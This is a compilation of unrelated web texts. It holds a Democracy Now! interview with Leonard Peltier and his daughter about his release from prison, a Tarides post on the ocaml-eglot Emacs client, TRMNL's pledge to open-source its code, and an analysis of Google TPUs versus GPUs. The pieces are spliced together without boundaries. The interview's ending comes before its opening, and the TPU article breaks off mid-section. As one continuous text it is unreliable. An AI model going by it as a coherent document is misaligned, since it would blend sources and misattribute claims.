But I was sleeping on my mom’s couch that morning, and I heard the phone ring. And then I heard my mom, and she said, “What?” And I thought the worst, of course, that they called to tell me my dad was dead. And then my cousin was crying, and she said, “Marquetta, I’m so happy.” So I was like, “What are you talking about?” She’s like, “Your dad’s getting out of prison.” I was like, you know, like — I cussed in my mom’s house. And I usually — unless I’m joking with her. I just was like, “You’re lying. You’re lying to me. You’re lying to me. My dad’s” — She’s like, “They’re — Joe Biden” — and, you know, this, that and the other. And I just — I couldn’t — I didn’t know what to do. I just — I froze. And I still can’t remember if I called my nephew or if I called my brother, who I called, but I called somebody, and I asked them. I was like, “Is it true? My dad’s getting out of prison?” And they’re like, “Yeah.”
I’m so thankful to millions of people for the last 49 years of my life that helped pray for him, that helped write letters, that helped make phone calls, that sent signed petitions. You know, that’s all those people in it and to help bring my dad home.
But the thing of it is, is people don’t understand that, you know, when my dad went to prison, so did we. You know, we were out here free, but we weren’t free. We were out here struggling when he was in there struggling. And I was blessed enough to have people like my grandmother and my mom to show me that, you know what, it’s going to be OK. It’s going to be OK.
AMY
GOODMAN
:
Leonard Peltier means so much to so many people around the world. Talk about what he means, not just to you as his daughter, but to you as an Indigenous woman.
MARQUETTA
SHIELDS
-
PELTIER
:
Oh, man, my dad, I told him this before. He’s my hero. He’s the definition of what a warrior should be, you know, to be able to stand strong and still come out of that prison smiling, to be able to set an example. And, like, I look up to my dad, because I don’t know very many people that could go through the stuff he’s been through and still have a smile on his face. And it makes me proud to call him my dad. You know, that’s my dad.
AMY
GOODMAN
:
Marquetta Shields-Peltier, the daughter of Leonard Peltier, speaking in September at Turtle Mountain Reservation in North Dakota, where Leonard has been living since being released from prison in February.
And that does it for today’s show. To see all of
Democracy Now!
's
coverage
of Leonard Peltier and our
interview
with him over the years behind bars, you can go to democracynow.org. Special thanks to Denis Moynihan, Charina Nadura, Sam Alcoff and Zazu, the newshound.
Democracy Now!
is produced with Mike Burke, Renée Feltz, Deena Guzder, Messiah Rhodes, Nermeen Shaikh, María Taracena, Nicole Salazar, Sara Nasser, Charina Nadura, Sam Alcoff, Tey-Marie Astudillo, John Hamilton, Robby Karran, Hany Massoud and Safwat Nazzal. Our executive director is Julie Crosby. Special thanks to Becca Staley, Jon Randolph, Paul Powell, Mike Di Filippo, Miguel Nogueira, Hugh Gran, Carl Marxer, David Prude, Dennis McCormick, Matt Ealy, Anna Özbek, Emily Andersen, Dante Torrieri and Buffy Saint Marie Hernandez. I'm Amy Goodman. Thanks so much for joining us.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Bringing Emacs Support to OCaml's LSP Server with ocaml-eglot
The team of people working on editors and editor support at Tarides is excited to announce the release of
ocaml-eglot
! The project is part of Tarides’ efforts to improve the OCaml developer experience across different platforms and workflows, a high-priority goal continuously evolving with community feedback.
Bringing Emacs integration to OCaml’s LSP server benefits both the user and the maintainer. If you use Emacs and want to start using OCaml, or switch to a more simplified setup, check out the
ocaml-eglot
repository
on GitHub to try the new Emacs minor mode.
This post will give you some background to the development of the new tool, as well as the benefits and limitations of LSP, and the features of
ocaml-eglot
. Let’s dive in!
The Problem: ‘Editor Burnout’
The goal of the
ocaml-eglot
project was to address a problem the engineers had dubbed
editor burnout
. Developers rely on editors to simplify their coding workflow, and over the years, the creation of more and more editor features has transformed editors into sophisticated, feature-rich development environments. However, all these features need to be added and maintained in every editor. Maintaining support for so many different features across different editors, including updating the support every time something changes on the language server's end, can quickly become untenable. ‘Editor burnout’ refers to the pressure this puts on maintainers.
In OCaml, the editor-agnostic server
Merlin
is used to provide IDE-like services. By providing contextual information about the code, Merlin lets developers use simple text editors to write OCaml and benefit from features that typically come from a fully integrated IDE. However, Merlin also had a high maintenance cost due to each code editor needing its own integration layer.
So, now that we understand the problem, what is the solution?
LSP and OCaml
LSP, or the
Language Server Protocol
, is a widely documented open protocol that standardises the interactions between an editor and a server providing IDE services. LSP defines a collection of standard features across programming languages, which has contributed to its widespread adoption. This adoption has made LSP a standard protocol across editors, including
Visual Studio Code
,
Vim
,
Emacs
, and many more.
The language server implementation for LSP in OCaml is
ocaml-lsp
. It uses Merlin as a library. It was originally designed to integrate with
Visual Studio Code
when paired with the
vscode-ocaml-platform
plugin. We can significantly reduce the maintenance burden by relying on LSP's defaults for editor compatibility and only providing support for OCaml-specific features. This benefits not only the maintainers, but also the user by ensuring the plugins remain performant, compatible, maintainable, and up-to-date.
LSP aims to be compatible with as many languages as possible, making some assumptions about how those languages are structured and function. Inevitably, these assumptions cannot cover all the features of every language. This is true of OCaml, where the editing experience relies on custom features outside the scope of the LSP.
The solution to this incompatibility is to create a
client-side extension
that covers what the editor’s standard LSP support does not. That way, we have both the basic LSP compatibility and an extension that adds support for OCaml-specific features. As we’ve hinted above, this has the added benefit of keeping the maintenance workload on the editor side down by delegating the standard LSP handling to the generic LSP plug-ins.
As an editor popular with the OCaml community, let’s take a brief look at how Emacs and OCaml work together. In Emacs, developers can attach a "buffer"/file to a major mode to handle a feature of a language like OCaml: features like syntax highlighting, for example. One file is always attached to just one major mode.
OCaml has four major modes:
caml-mode
: the original,
tuareg
: a full reimplementation of
caml-mode
and the most common choice by users,
ocaml-ts-mode
: an experimental version of
caml-mode
based on tree-sitter grammar,
neocaml
: an experimental full reimplementation of
tuareg
based on tree-sitter grammar.
Now, we can also attach one or multiple
minor-mode
s to a file, and this is where
ocaml-eglot
comes into play. For example, we can use a major mode (we generally recommend Tuareg) and link
ocaml-eglot
to it as a minor mode, thereby attaching LSP features to all files in which Tuareg is active.
Eglot is the default LSP client bundled with Emacs, and
ocaml-eglot
provides full OCaml language support in Emacs as an alternative to Merlin integration. (By the way, thanks to the
ocaml-eglot
client using LSP’s defaults, its code size is a lot smaller than the traditional OCaml
Emacs
mode, which also makes it easier to maintain!).
The ideal user of
ocaml-eglot
is someone who is already an active Emacs user and wants to start using OCaml with minimal start-up hassle. The simplified configuration, automated setup, and consistency across different editors and languages are helpful both to people new to OCaml and to seasoned users with multiple editors, since they improve the workflow. The plugin supports all the features of the integration of Merlin into Emacs,
merlin.el
, meaning that users don’t lose any functionality with the new system. The
ocaml-eglot
project is also actively maintained, and users can expect regular future updates and a tool that evolves with the times.
Creating OCaml-Eglot
Let's peek behind the curtain at the development of
ocaml-eglot
. There are two common approaches that developers who implement server languages tend to use to add features outside of the LSP. These are
Code Actions
and Custom Requests:
Code Action: A contextual action that can be triggered from a document perspective, can perform a file modification, and potentially broadcast a command that can be interpreted by the client. Code Actions are more
‘integrated’, which means that they sometimes even work ‘out of the box’ with the client. However, they are limited in terms of interactions and the command lifecycle.
Custom Request: Not formally part of the protocol, but since LSP is a protocol layered on top of a regular server that can handle JSON RPC messages and responses, developers can still use arbitrary requests to provide extra features. Custom Requests give developers more power to add interactions and experiences, but always need specific editor integration.
The design process behind OCaml-eglot essentially boiled down to identifying all the features offered by
merlin.el
that were not covered by the LSP, and then adding them using Code Actions or Custom Requests. During this process, the developers asked themselves two questions to help them decide which approach to use:
Should the feature be configured by arguments that are
independent of the context:
If the answer is yes, they used a Custom Request; if no, they used a Code Action.
Does the feature require
additional interaction
such as choosing one option from a set of possible results?: If yes, they used a Custom Request; if no, they used a Code Action.
Of course, things were a little more complicated than this in reality, but it still gives you a good idea of the types of technical decisions the team made during development.
Try it Out!
Install
ocaml-eglot
by checking out its
GitHub repository
and following the instructions. When you have had a chance to test it out in your projects, please share your experience on
OCaml Discuss
to give other users an idea of what to expect and the maintainers an idea on what to improve!
Installing
ocaml-eglot
is just like installing a regular Emacs package. It is available on
Melpa
and can be installed in many different ways, for example with GNU’s
use package
. More detailed instructions are available
in the repo’s readme
, including instructions on recommended configurations for
ocaml-eglot
.
Features
Some of the features that
ocaml-eglot
comes with are:
Error navigation: Quickly jump to the next or previous error(s).
Type information: Display types under cursor with adjustable verbosity and navigate enclosing expressions.
Code generation: Pattern match construction, case completion, and wildcard refinement via the ‘destruct’ feature.
Navigation: Jump between language constructs like let, module, function, match, and navigate phrases and pattern cases.
Search: Find definitions, declarations, and references. The team also recently introduced a new Xref Backend inspired by one used by Jane Street for years.
Check out the project's readme to discover the full list of commands offered by
ocaml-eglot
. The new mode is ‘agile’, meaning that the team can also incubate new features quickly, like the
refactor extract at toplevel
.
You can connect with us on
Bluesky
,
Mastodon
,
Threads
, and
LinkedIn
or sign up to our mailing list to stay updated on our latest projects. We look forward to hearing from you!
We made a promise to never brick your device. Here's a progress report:
1. July 2024 - open sourced
our firmware
2. December 2024 - built or commissioned server clients in
Ruby
,
Elixir
, and
Python
3. January 2025 - began selling
BYOD licenses
-
DIY build docs coming soon
4. February 2025 -
launched Framework
, a beautiful and free e-ink UI kit
5. February 2025 - onboarded a senior engineer to focus on OSS (hi
Brooke
!)
But there's still 1 concern.
As more TRMNL devices opt into our lifetime-access hosted platform,
how will we handle growing server costs?
Introducing the Unbrickable Pledge.
As of February 18, 2025, the entire TRMNL team, operating under TRMNL Holdings LLC, hereby affirms our intent to release the core web application source code if and when we ever become insolvent as a company.
Sharing source code is the right thing to do for our customers. Preventing e-waste is the right thing to do for our planet. And sharing How is the right thing to do for TRMNL.
We hope this alleviates concerns by those who are much better at math than us and wondered:
how is this business model possible
?
It's possible because of you.
To staying focused,
Ryan and the TRMNL team
TPUs vs. GPUs and why Google is positioned to win AI race in the long term
As I find the topic of Google TPUs extremely important, I am publishing a comprehensive deep dive, not just a technical overview, but also strategic and financial coverage of the Google TPU.
Topics covered:
The history of the TPU and why it all even started?
The difference between a TPU and a GPU?
Performance numbers TPU vs GPU?
Where are the problems for the wider adoption of TPUs
Google’s TPU is the biggest competitive advantage of its cloud business for the next 10 years
How many TPUs does Google produce today, and how big can that get?
Gemini 3 and the aftermath of Gemini 3 on the whole chip industry
Let’s dive into it.
The history of the TPU and why it all even started?
The story of the Google Tensor Processing Unit (TPU) begins not with a breakthrough in chip manufacturing, but with a realization about math and logistics. Around 2013, Google’s leadership—specifically Jeff Dean, Jonathan Ross (the CEO of Groq), and the Google Brain team—ran a projection that alarmed them. They calculated that if every Android user utilized Google’s new voice search feature for just three minutes a day, the company would need to double its global data center capacity just to handle the compute load.
At the time, Google was relying on standard CPUs and GPUs for these tasks. While powerful, these general-purpose chips were inefficient for the specific heavy lifting required by Deep Learning: massive matrix multiplications. Scaling up with existing hardware would have been a financial and logistical nightmare.
This sparked a new project. Google decided to do something rare for a software company: build its own custom silicon. The goal was to create an
ASIC (Application-Specific Integrated Circuit)
designed for one job only: running TensorFlow neural networks.
Key Historical Milestones:
2013-2014:
The project moved really fast as Google both hired a very capable team and, to be honest, had some luck in their first steps. The team went from design concept to deploying silicon in data centers in just 15 months—a very short cycle for hardware engineering.
2015:
Before the world knew they existed, TPUs were already powering Google’s most popular products. They were silently accelerating Google Maps navigation, Google Photos, and Google Translate.
2016
:
Google officially unveiled the TPU at Google I/O 2016.
This urgency to solve the “data center doubling” problem is why the TPU exists. It wasn’t built to sell to gamers or render video; it was built to save Google from its own AI success. With that in mind, Google has been thinking about the »costly« AI inference problems for over a decade now. This is also one of the main reasons why the TPU is so good today compared to other ASIC projects.
The difference between a TPU and a GPU?
To understand the difference, it helps to look at what each chip was originally built to do. A GPU is a “general-purpose” parallel processor, while a TPU is a “domain-specific” architecture.
The GPUs were designed for graphics. They excel at parallel processing (doing many things at once), which is great for AI. However, because they are designed to handle everything from video game textures to scientific simulations, they carry “architectural baggage.” They spend significant energy and chip area on complex tasks like caching, branch prediction, and managing independent threads.
A TPU, on the other hand, strips away all that baggage. It has no hardware for rasterization or texture mapping. Instead, it uses a unique architecture called a Systolic Array.
The “Systolic Array” is the key differentiator. In a standard CPU or GPU, the chip moves data back and forth between the memory and the computing units for every calculation. This constant shuffling creates a bottleneck (the Von Neumann bottleneck).
In a TPU’s systolic array, data flows through the chip like blood through a heart (hence “systolic”).
It loads data (weights) once.
It passes inputs through a massive grid of multipliers.
The data is passed directly to the next unit in the array without writing back to memory.
What this means, in essence, is that a TPU, because of its systolic array, drastically reduces the number of memory reads and writes required from HBM. As a result, the TPU can spend its cycles computing rather than waiting for data.
Google’s new TPU design, also called Ironwood also addressed some of the key areas where a TPU was lacking:
They enhanced the SparseCore for efficiently handling large embeddings (good for recommendation systems and LLMs)
It increased HBM capacity and bandwidth (up to 192 GB per chip). For a better understanding, Nvidia’s Blackwell B200 has 192GB per chip, while Blackwell Ultra, also known as the B300, has 288 GB per chip.
Improved the Inter-Chip Interconnect (ICI) for linking thousands of chips into massive clusters, also called TPU Pods (needed for AI training as well as some time test compute inference workloads). When it comes to ICI, it is important to note that it is very performant with a Peak Bandwidth of 1.2 TB/s vs Blackwell NVLink 5 at 1.8 TB/s. But Google’s ICI, together with its specialized compiler and software stack, still delivers superior performance on some specific AI tasks.
The key thing to understand is that because the TPU doesn’t need to decode complex instructions or constantly access memory, it can deliver significantly higher Operations Per Joule.
For scale-out, Google uses Optical Circuit Switch (OCS) and its 3D torus network, which compete with Nvidia’s InfiniBand and Spectrum-X Ethernet. The main difference is that OCS is extremely cost-effective and power-efficient as it eliminates electrical switches and O-E-O conversions, but because of this, it is not as flexible as the other two. So again, the Google stack is extremely specialized for the task at hand and doesn’t offer the flexibility that GPUs do.
Performance numbers TPU vs GPU?
As we defined the differences, let’s look at real numbers showing how the TPU performs compared to the GPU. Since Google isn’t revealing these numbers, it is really hard to get details on performance. I studied many articles and alternative data sources, including interviews with industry insiders, and here are some of the key takeaways.
The first important thing is that there is very limited information on Google’s newest TPUv7 (Ironwood), as Google introduced it in April 2025 and is just now starting to become available to external clients (internally, it is said that Google has already been using Ironwood since April, possibly even for Gemini 3.0.). And why is this important if we, for example, compare TPUv7 with an older but still widely used version of TPUv5p based on Semianalysis data:
TPUv7 produces 4,614 TFLOPS(BF16) vs 459 TFLOPS for TPUv5p
TPUv7 has 192GB of memory capacity vs TPUv5p 96GB
TPUv7 memory Bandwidth is 7,370 GB/s vs 2,765 for v5p
We can see that the performance leaps between v5 and v7 are very significant. To put that in context, most of the comments that we will look at are more focused on TPUv6 or TPUv5 than v7.
Based on analyzing a ton of interviews with Former Google employees, customers, and competitors (people from AMD, NVDA & others), the summary of the results is as follows.
Most agree that TPUs are more cost-effective compared to Nvidia GPUs, and most agree that the performance per watt for TPUs is better. This view is not applicable across all use cases tho.
A Former Google Cloud employee:
»If it is the right application, then they can deliver much better performance per dollar compared to GPUs. They also require much lesser energy and produces less heat compared to GPUs. They’re also more energy efficient and have a smaller environmental footprint, which is what makes them a desired outcome.
The use cases are slightly limited to a GPU, they’re not as generic, but for a specific application, they can offer as much as 1.4X better performance per dollar, which is pretty significant saving for a customer that might be trying to use GPU versus TPUs.«
Similarly, a very insightful comment from a Former Unit Head at Google around TPUs materially lowering AI-search cost per query vs GPUs:
»TPU v6 is 60-65% more efficient than GPUs, prior generations 40-45%«
This interview was in November 2024, so the expert is probably comparing the v6 TPU with the Nvidia Hopper. Today, we already have Blackwell vs V7.
Many experts also mention the speed benefit that TPUs offer, with a Former Google Head saying that TPUs are 5x faster than GPUs for training dynamic models (like search-like workloads).
There was also a very eye-opening interview with a client who used both Nvidia GPUs and Google TPUs as he describes the economics in great detail:
»If I were to use eight H100s versus using one v5e pod, I would spend a lot less money on one v5e pod. In terms of price point money, performance per dollar, you will get more bang for TPU. If I already have a code, because of Google’s help or because of our own work, if I know it already is going to work on a TPU, then at that point it is beneficial for me to just stick with the TPU usage.
In the long run, if I am thinking I need to write a new code base, I need to do a lot more work, then it depends on how long I’m going to train. I would say there is still some, for example, of the workload we have already done on TPUs that in the future because as Google will add newer generation of TPU, they make older ones much cheaper.
For example, when they came out with v4, I remember the price of v2 came down so low that it was practically free to use compared to any NVIDIA GPUs.
Google has got a good promise so they keep supporting older TPUs and they’re making it a lot cheaper. If you don’t really need your model trained right away, if you’re willing to say, “I can wait one week,” even though the training is only three days, then you can reduce your cost 1/5.«
Another valuable interview was with a current AMD employee, acknowledging the benefits of ASICs:
»I would expect that an AI accelerator could do about probably typically what we see in the industry. I’m using my experience at FPGAs. I could see a 30% reduction in size and maybe a 50% reduction in power vs a GPU.«
We also got some numbers from a Former Google employee who worked in the chip segment:
»When I look at the published numbers, they (TPUs) are anywhere from 25%-30% better to close to 2x better, depending on the use cases compared to Nvidia. Essentially, there’s a difference between a very custom design built to do one task perfectly versus a more general purpose design.«
What is also known is that the real edge of TPUs lies not in the hardware but in the software and in the way Google has optimized its ecosystem for the TPU.
A lot of people mention the problem that every Nvidia »competitor« like the TPU faces, which is the fast development of Nvidia and the constant »catching up« to Nvidia problem. This month a former Google Cloud employee addressed that concern head-on as he believes the rate at which TPUs are improving is faster than the rate at Nvidia:
»The amount of performance per dollar that a TPU can generate from a new generation versus the old generation is a much significant jump than Nvidia«
In addition, the recent data from Google’s presentation at the Hot Chips 2025 event backs that up, as Google stated that the TPUv7 is 100% better in performance per watt than their TPUv6e (Trillium).
Even for hard Nvidia advocates, TPUs are not to be shrugged off easily, as even Jensen thinks very highly of Google’s TPUs. In a podcast with Brad Gerstner, he mentioned that when it comes to ASICs, Google with TPUs is a »special case«. A few months ago, we also got an article from the WSJ saying that after the news publication The Information published a report that stated that OpenAI had begun renting Google TPUs for ChatGPT, Jensen called Altman, asking him if it was true, and signaled that he was open to getting the talks back on track (investment talks). Also worth noting was that Nvidia’s official X account posted a screenshot of an article in which OpenAI denied plans to use Google’s in-house chips. To say the least, Nvidia is watching TPUs very closely.
Ok, but after looking at some of these numbers, one might think, why aren’t more clients using TPUs?
Where are the problems for the wider adoption of TPUs
The main problem for TPUs adoption is the ecosystem. Nvidia’s CUDA is engraved in the minds of most AI engineers, as they have been learning CUDA in universities.
Google has developed its ecosystem internally but not externally, as it has used TPUs only for its internal workloads until now. TPUs use a combination of JAX and TensorFlow, while the industry skews to CUDA and PyTorch (although TPUs also support PyTorch now). While Google is working hard to make its ecosystem more supportive and convertible with other stacks, it is also a matter of libraries and ecosystem formation that takes years to develop.
It is also important to note that, until recently, the GenAI industry’s focus has largely been on training workloads. In training workloads, CUDA is very important, but when it comes to inference, even reasoning inference, CUDA is not that important, so the chances of expanding the TPU footprint in inference are much higher than those in training (although TPUs do really well in training as well – Gemini 3 the prime example).
The fact that most clients are multi-cloud also poses a challenge for TPU adoption, as AI workloads are closely tied to data and its location (cloud data transfer is costly). Nvidia is accessible via all three hyperscalers, while TPUs are available only at GCP so far. A client who uses TPUs and Nvidia GPUs explains it well:
»Right now, the one biggest advantage of NVIDIA, and this has been true for past three companies I worked on is because AWS, Google Cloud and Microsoft Azure, these are the three major cloud companies.
Every company, every corporate, every customer we have will have data in one of these three. All these three clouds have NVIDIA GPUs. Sometimes the data is so big and in a different cloud that it is a lot cheaper to run our workload in whatever cloud the customer has data in.
I don’t know if you know about the egress cost that is moving data out of one cloud is one of the bigger cost. In that case, if you have NVIDIA workload, if you have a CUDA workload, we can just go to Microsoft Azure, get a VM that has NVIDIA GPU, same GPU in fact, no code change is required and just run it there.
With TPUs, once you are all relied on TPU and Google says, “You know what? Now you have to pay 10X more,” then we would be screwed, because then we’ll have to go back and rewrite everything. That’s why. That’s the only reason people are afraid of committing too much on TPUs. The same reason is for Amazon’s Trainium and Inferentia.«
These problems are well known at Google, so it is no surprise that internally, the debate over keeping TPUs inside Google or starting to sell them externally is a constant topic. When keeping them internally, it enhances the GCP moat, but at the same time, many former Google employees believe that at some point, Google will start offering TPUs externally as well, maybe through some neoclouds, not necessarily with the biggest two competitors, Microsoft and Amazon. Opening up the ecosystem, providing support, etc., and making it more widely usable are the first steps toward making that possible.
A former Google employee also mentioned that Google last year formed a more sales-oriented team to push and sell TPUs, so it’s not like they have been pushing hard to sell TPUs for years; it is a fairly new dynamic in the organization.
Google’s TPU is the biggest competitive advantage of its cloud business for the next 10 years
The most valuable thing for me about TPUs is their impact on GCP. As we witness the transformation of cloud businesses from the pre-AI era to the AI era, the biggest takeaway is that the industry has gone from an oligopoly of AWS, Azure, and GCP to a more commoditized landscape, with Oracle, Coreweave, and many other neoclouds competing for AI workloads. The problem with AI workloads is the competition and Nvidia’s 75% gross margin, which also results in low margins for AI workloads. The cloud industry is moving from a 50-70% gross margin industry to a 20-35% gross margin industry. For cloud investors, this should be concerning, as the future profile of some of these companies is more like that of a utility than an attractive, high-margin business. But there is a solution to avoiding that future and returning to a normal margin: the ASIC.
The cloud providers who can control the hardware and are not beholden to Nvidia and its 75% gross margin will be able to return to the world of 50% gross margins. And there is no surprise that all three AWS, Azure, and GCP are developing their own ASICs. The most mature by far is Google’s TPU, followed by Amazon’s Trainum, and lastly Microsoft’s MAIA (although Microsoft owns the full IP of OpenAI’s custom ASICs, which could help them in the future).
While even with ASICs you are not 100% independent, as you still have to work with someone like Broadcom or Marvell, whose margins are lower than Nvidia’s but still not negligible, Google is again in a very good position. Over the years of developing TPUs, Google has managed to control much of the chip design process in-house. According to a current AMD employee, Broadcom no longer knows everything about the chip. At this point, Google is the front-end designer (the actual RTL of the design) while Broadcom is only the backend physical design partner. Google, on top of that, also, of course, owns the entire software optimization stack for the chip, which makes it as performant as it is. According to the AMD employee, based on this work split, he thinks Broadcom is lucky if it gets a 50-point gross margin on its part.
Without having to pay Nvidia for the accelerator, a cloud provider can either price its compute similarly to others and maintain a better margin profile or lower costs and gain market share. Of course, all of this depends on having a very capable ASIC that can compete with Nvidia. Unfortunately, it looks like Google is the only one that has achieved that, as the number one-performing model is Gemini 3 trained on TPUs. According to some former Google employees, internally, Google is also using TPUs for inference across its entire AI stack, including Gemini and models like Veo. Google buys Nvidia GPUs for GCP, as clients want them because they are familiar with them and the ecosystem, but internally, Google is full-on with TPUs.
As the complexity of each generation of ASICs increases, similar to the complexity and pace of Nvidia, I predict that not all ASIC programs will make it. I believe outside of TPUs, the only real hyperscaler shot right now is AWS Trainium, but even that faces much bigger uncertainties than the TPU. With that in mind, Google and its cloud business can come out of this AI era as a major beneficiary and market-share gainer.
Recently, we even got comments from the SemiAnalysis team praising the TPU:
»Google’s silicon supremacy among hyperscalers is unmatched, with their TPU 7
th
Gen arguably on par with Nvidia Blackwell. TPU powers the Gemini family of models which are improving in capability and sit close to the pareto frontier of $ per intelligence in some tasks«
How many TPUs does Google produce today, and how big can that get?
Here are the numbers that I researched:
"I'm Not Going to Give Up": Leonard Peltier on Indigenous Rights, His Half-Century in Prison & Coming Home
Democracy Now!
www.democracynow.org
2025-11-27 13:01:50
In September, Democracy Now! host Amy Goodman sat down with longtime political prisoner and Indigenous activist Leonard Peltier for his first extended television and radio broadcast interview since his release to home confinement in February. Before his commutation by former President Joe Biden, the...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
In this special broadcast, we spend the hour with longtime Indigenous activist Leonard Peltier. In February, he was released from a federal prison in Florida after spending nearly half a century behind bars for a crime he says he did not commit. President Biden, on his last day in office, commuted Peltier’s life sentence to home confinement. Biden’s decision followed mounting calls by tribal leaders and supporters around the world in a decadeslong, community-led campaign fighting for his freedom.
In the 1970s, Peltier was involved with the American Indian Movement, known as
AIM
. In 1975, two
FBI
agents and one young
AIM
activist were killed in a shootout on the Pine Ridge Reservation in South Dakota. Two
AIM
members were later arrested for killing the agents. At the trial, the jury acquitted them. Leonard Peltier was arrested later, tried separately and convicted. Peltier has always maintained his innocence.
Notable supporters of Leonard Peltier over the years have included South African President Nelson Mandela, Pope Francis and Amnesty International. Supporters of Peltier say his trial was marked by gross
FBI
and federal prosecutorial misconduct, including the coercion of witnesses, fabricated testimony and suppressed exculpatory evidence.
After being released in February, Leonard Peltier returned home to live on the Turtle Mountain Band of Chippewa Reservation in Belcourt, North Dakota. On September 12th, Leonard Peltier celebrated his 81st birthday. People gathered throughout the day, visiting him and calling from around the world to celebrate. That night and the next day, we spoke to Leonard Peltier in his living room in his first extended TV/radio broadcast interview since his release from prison.
AMY
GOODMAN
:
Hi. I’m Amy Goodman, host of
Democracy Now!
, in the home of Leonard Peltier, just recently freed from prison after 49 years.
LEONARD
PELTIER
:
Plus two months.
AMY
GOODMAN
:
Plus two months.
LEONARD
PELTIER
:
Yeah.
AMY
GOODMAN
:
I’ve spoken to you so many times, Leonard, in prison, in various prisons, several of them supermax prisons. It is quite astonishing to be here with you in person. Tell us where we are. Where are we sitting?
LEONARD
PELTIER
:
We’re sitting in my home, that was given to me by my supporters. This was not given to me by the tribe, or the government had nothing to do with it. I was released by Biden under a commutation of my sentence and home confinement. Actually, what happened was, I was — I was taken out of one prison cell and really put into another type of prison. But this is my home now. This is my home. So it’s a million times better.
AMY
GOODMAN
:
Wait, what do you mean when you say you were taken out of your prison cell after more than 49 years, and you’re saying that you’re not completely free?
LEONARD
PELTIER
:
No, no, I’m on very restrictive restrictions. Even to go to the post office, I got to call my — I call her my handler. I have to call her to go to the post office. Then, when I get back, I have to call her and tell her I’m back. Or if I go anything, if I go shopping or whatever, I have to do that. If I have to go a hundred miles past the nation — I don’t call my place a “reservation,” either; we’re nations of people — I have to get a pass, usually from Washington, D.C., to go to medical, usually medical, or religious ceremonies on different nations, Indian Native nations.
AMY
GOODMAN
:
So, let’s go back to that moment when you were in that prison cell in Coleman, in Florida, and you got word that President Biden had commuted your sentence. It was just hours before he was leaving office? Can you tell us about that process, how it took place?
LEONARD
PELTIER
:
Well, as I went through the years filing for pardons and stuff, Ronald Reagan was the first one to promise to leave me — pardon me. Somebody in Washington stopped it. There’s only one organization that could have stopped it, and didn’t have the power to stop it, but still, somehow, were in power, enough to where they can override a president of the United States, our Congress. It’s the
FBI
. And Reagan promised to let me go. And the
FBI
intervened, and that was stopped. And Bill Clinton and Obama, and, finally, we get to Biden.
And Biden, there was pressure put on him from all over the world. Almost every tribal nation here in the United States filed for my release, demanding my release. The United Nations — the United Nations did a full report on my case, and they demanded that I be released immediately and to be “paid,” quote-unquote. Hundreds of Congress and senators and millions of people —
AMY
GOODMAN
:
And the pope.
LEONARD
PELTIER
:
And the pope, two popes, the last pope and the current pope. And world leaders, many world leaders, demanded my release.
AMY
GOODMAN
:
The Nobel Peace laureate, bishop — Archbishop Desmond Tutu?
LEONARD
PELTIER
:
Yes. I was also nominated for — and nominated four times, because of my work from prisons, for a Nobel Prize. And the board and everything granted it, but somebody intervened again. So, four times, I lost that.
I think somebody was pushing Biden to stop any — any possibility of signing a pardon. So, he didn’t sign it until the last moment. And actually, a day and a half before he actually signed it and he was — his term was completed, I just took the position that, “Nah, he’s not going to do this.” And I just kind of laid back in my cell, and I thought to myself, “Well, I guess I die here, and this is the only ultimate sacrifice I can make, and I have to accept it. I have no other choice.”
And as I laid there and thinking about it, other people came by — even guards would tell me, “Don’t give up, Leonard. Don’t give up.” And other prisoners, and some of them prisoners were telling me that, “Leonard, he’s got to know that if he doesn’t sign this, this is political suicide for the Democratic Party, because there’s millions of people that are going to break away from this if he doesn’t.”
And so, I was laying there, and I was thinking, “Well, let’s try one more thing.” So I called a representative of mine that was working closely with the Biden administration. We got — we have Native people — we had Native people in his administration who were communicating with Biden. And I said, “Tell him to give me a commutation on my sentence and home confinement.” So, she called and did this, and that’s what I ended up with. And that’s what I’m — that’s what I’m living under right now.
AMY
GOODMAN
:
How did you hear that you were going to be free?
LEONARD
PELTIER
:
Well, it was kind of unbelievable in the immediate moment. I thought somebody was just playing games with me. And I thought, “Ah, I’m going to wake up, and this is all a dream, and I’m in the cell, and I’ll be in there.” And I really didn’t believe it until, actually, I walked in the house here.
AMY
GOODMAN
:
What was it like to leave Coleman?
LEONARD
PELTIER
:
Wow! Imagine living in a cubicle larger than some people’s closets for all those years, and then you finally are able to walk out of there. I mean, it was just — for me, it was unbelievable that this was actually happening to me. But, I mean, the feeling of, wow, I can go — I’ll be home. I won’t be able to — I won’t have to go to bed in this cold cell with one blanket, and I won’t have to smell my celly going to the bathroom. I won’t have to eat cold meals. Is this really over for me? Is this really going to be over for me? And it was disbelief. A lot of it was disbelief, really.
AMY
GOODMAN
:
And now we’re sitting here in your living room surrounded by the paintings you did in prison.
LEONARD
PELTIER
:
Yes.
AMY
GOODMAN
:
You are an artist extraordinaire, maybe about to have a gallery showing in New York. Through the years, you sold your paintings. Talk about painting in prison and how you came to be a painter.
LEONARD
PELTIER
:
Well, see, a lot of people think we were allowed to paint in our cells and stuff. We were not. We were not allowed. They had an art room, hobby craft area, and one of the — one of the hobby crafts was painting. So, you have to sign up for that. A lot of people think that all the art supplies was given to you by the prison, the hobby crafter. That’s not true, either. We have to buy our own. And I went and signed up immediately to go into the art hobby craft. And I used to go there every day, and that’s what I did. I painted and painted and painted ’til I was able to create my own style and everything, yeah.
AMY
GOODMAN
:
Can you see your paintings now?
LEONARD
PELTIER
:
No. Two months ago, I think now, I lost 80% of my vision. And I’m in the process of, hopefully, getting my eyesight returned, treated and returned.
AMY
GOODMAN
:
We’re spending the hour with the Indigenous leader, longtime political prisoner, Leonard Peltier. He was released in February from prison after nearly half a century behind bars. Coming up, he talks about being put in an Indian boarding school as a child, his activism and more. We’ll also speak with his daughter, Marquetta Shields-Peltier. She was just a toddler when her father was imprisoned in 1976.
[break]
AMY
GOODMAN
:
This is
Democracy Now!
, democracynow.org,
The War and Peace Report
. I’m Amy Goodman.
We’re continuing with our conversation with longtime Indigenous activist Leonard Peltier in Belcourt, North Dakota. I spoke to him there on his 81st birthday weekend on the Turtle Mountain Band of Chippewa Cree Reservation. He was released in February from the federal prison in Florida after nearly half a century behind bars.
AMY
GOODMAN
:
So, take us back in time. Introduce us to you, starting by saying your name, who your parents were, the nations they were a part of, your family, where you lived growing up.
LEONARD
PELTIER
:
OK. My name is — English name is Leonard Peltier. I’m 81 years old as of yesterday. My father is a Chippewa Cree, from this reservation, this nation right here.
